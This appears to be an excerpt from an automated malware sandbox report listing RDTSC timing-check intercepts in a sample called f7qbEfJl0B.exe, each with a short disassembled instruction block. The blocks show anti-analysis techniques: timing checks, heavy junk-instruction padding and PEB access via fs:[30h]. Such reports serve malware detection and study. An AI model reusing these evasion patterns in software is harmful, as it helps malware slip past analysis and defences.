Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65AF second address: 18B65C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007F7B216C3176h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65C4 second address: 18B65CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B65CE second address: 18B65E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnc 00007F7B216C3176h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B91F8 second address: 18B9224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F7B212E85C6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7B212E85CDh 0x0000001c push edi 0x0000001d jl 00007F7B212E85C6h 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B9224 second address: 18B9229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B9229 second address: 18B9233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD855 second address: 18BD873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ch 0x00000007 jnl 00007F7B216C3176h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD873 second address: 18BD878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18BD878 second address: 18BD884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F7B216C3176h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18C6D21 second address: 18C6D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a jnl 00007F7B212E85CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7B212E85CEh 0x00000017 jp 00007F7B212E85C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CA76E second address: 18CA777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED33 second address: 18CED39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED39 second address: 18CED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CED3F second address: 18CED45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CEEAD second address: 18CEED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7B216C3186h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CEED0 second address: 18CEED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF010 second address: 18CF017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF017 second address: 18CF01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF01D second address: 18CF02F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F7B216C3176h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18CF16C second address: 18CF174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D1FF2 second address: 18D2017 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F7B216C317Bh 0x0000000e jbe 00007F7B216C3176h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F7B216C3176h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D2017 second address: 18D201B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D201B second address: 18D203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7B216C3182h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D203A second address: 18D203E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18D203E second address: 18D204C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916BF8 second address: 1916BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916BFC second address: 1916C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916C00 second address: 1916C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7B212E85C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1916C11 second address: 1916C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19265E4 second address: 19265EE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B212E85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19265EE second address: 192661A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Fh 0x00000009 jmp 00007F7B216C3189h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3696 second address: 19F36A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7B212E85C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F36A1 second address: 19F36A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3933 second address: 19F3937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3937 second address: 19F3957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7B216C3176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F7B216C317Bh 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3957 second address: 19F395D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3C8C second address: 19F3C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3C95 second address: 19F3CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA0 second address: 19F3CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA4 second address: 19F3CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F3CA8 second address: 19F3CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F716A second address: 19F7185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7185 second address: 19F718A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F74F5 second address: 19F750E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B212E85D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F750E second address: 19F7558 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7B216C3189h 0x0000000e nop 0x0000000f mov dx, bx 0x00000012 push 00000004h 0x00000014 push eax 0x00000015 mov dword ptr [ebp+129C1CC8h], ecx 0x0000001b pop edx 0x0000001c push 86BE0463h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7B216C3183h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7888 second address: 19F7892 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B212E85CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19F7892 second address: 19F78BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F7B216C317Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7B216C317Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA73C second address: 19FA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA740 second address: 19FA762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F7B216C3176h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA762 second address: 19FA766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA341 second address: 19FA345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FA345 second address: 19FA349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FC11E second address: 19FC12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C317Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 19FC12E second address: 19FC134 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10024 second address: 6E1004B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F7B216C3184h 0x0000000b mov cx, 8271h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1004B second address: 6E1004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1004F second address: 6E10053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10053 second address: 6E10059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10059 second address: 6E10074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10074 second address: 6E10078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10078 second address: 6E1007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1007E second address: 6E10116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, 53CF4BA7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov ax, 089Fh 0x00000014 push ecx 0x00000015 push edx 0x00000016 pop eax 0x00000017 pop edi 0x00000018 popad 0x00000019 mov eax, dword ptr fs:[00000030h] 0x0000001f pushad 0x00000020 jmp 00007F7B212E85D8h 0x00000025 mov bx, cx 0x00000028 popad 0x00000029 sub esp, 18h 0x0000002c jmp 00007F7B212E85CCh 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F7B212E85CDh 0x0000003b or ax, CDD6h 0x00000040 jmp 00007F7B212E85D1h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007F7B212E85D0h 0x0000004c and esi, 6816CBF8h 0x00000052 jmp 00007F7B212E85CBh 0x00000057 popfd 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10116 second address: 6E1011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1011C second address: 6E10120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10120 second address: 6E10124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10124 second address: 6E1017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F7B212E85CAh 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007F7B212E85CBh 0x00000017 sub ax, CC6Eh 0x0000001c jmp 00007F7B212E85D9h 0x00000021 popfd 0x00000022 popad 0x00000023 movzx ecx, bx 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 mov ebx, 106597FCh 0x0000002e mov eax, edi 0x00000030 popad 0x00000031 mov ebx, dword ptr [eax+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1017D second address: 6E10181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10181 second address: 6E10187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10187 second address: 6E101A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 5E06h 0x00000011 mov ecx, edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E101A1 second address: 6E10236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, dx 0x0000000e pushfd 0x0000000f jmp 00007F7B212E85CDh 0x00000014 xor esi, 3F176616h 0x0000001a jmp 00007F7B212E85D1h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F7B212E85CEh 0x00000027 mov esi, dword ptr [74E806ECh] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov esi, ebx 0x00000032 pushfd 0x00000033 jmp 00007F7B212E85D9h 0x00000038 xor eax, 152C18D6h 0x0000003e jmp 00007F7B212E85D1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10236 second address: 6E1023E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10373 second address: 6E1039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F7B212E85CEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B212E85CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1039B second address: 6E103F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B216C3181h 0x00000009 xor ax, 1146h 0x0000000e jmp 00007F7B216C3181h 0x00000013 popfd 0x00000014 mov eax, 5D0F97F7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e call 00007F7B216C3188h 0x00000023 mov ebx, eax 0x00000025 pop esi 0x00000026 mov eax, ebx 0x00000028 popad 0x00000029 push dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E103F7 second address: 6E103FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E103FB second address: 6E1040D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1040D second address: 6E1042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7B212E85CBh 0x00000016 push eax 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1042C second address: 6E10440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C3180h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10440 second address: 6E10484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7B212E85CBh 0x00000017 and ecx, 580E854Eh 0x0000001d jmp 00007F7B212E85D9h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E104C5 second address: 6E105A1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B216C3188h 0x00000008 add ecx, 48704E88h 0x0000000e jmp 00007F7B216C317Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov esi, eax 0x00000019 pushad 0x0000001a jmp 00007F7B216C3184h 0x0000001f jmp 00007F7B216C3182h 0x00000024 popad 0x00000025 test esi, esi 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, 3650DF73h 0x0000002e pushfd 0x0000002f jmp 00007F7B216C3188h 0x00000034 xor ecx, 4BAA8E78h 0x0000003a jmp 00007F7B216C317Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push ecx 0x00000042 movsx edx, ax 0x00000045 pop eax 0x00000046 popad 0x00000047 je 00007F7B8F6B22C4h 0x0000004d jmp 00007F7B216C3187h 0x00000052 sub eax, eax 0x00000054 jmp 00007F7B216C317Fh 0x00000059 mov dword ptr [esi], edi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F7B216C3185h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E105A1 second address: 6E105F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F7B212E85CEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 call 00007F7B212E85CDh 0x0000001b pop eax 0x0000001c pop edi 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 mov dword ptr [esi+0Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7B212E85CFh 0x0000002a rdtsc
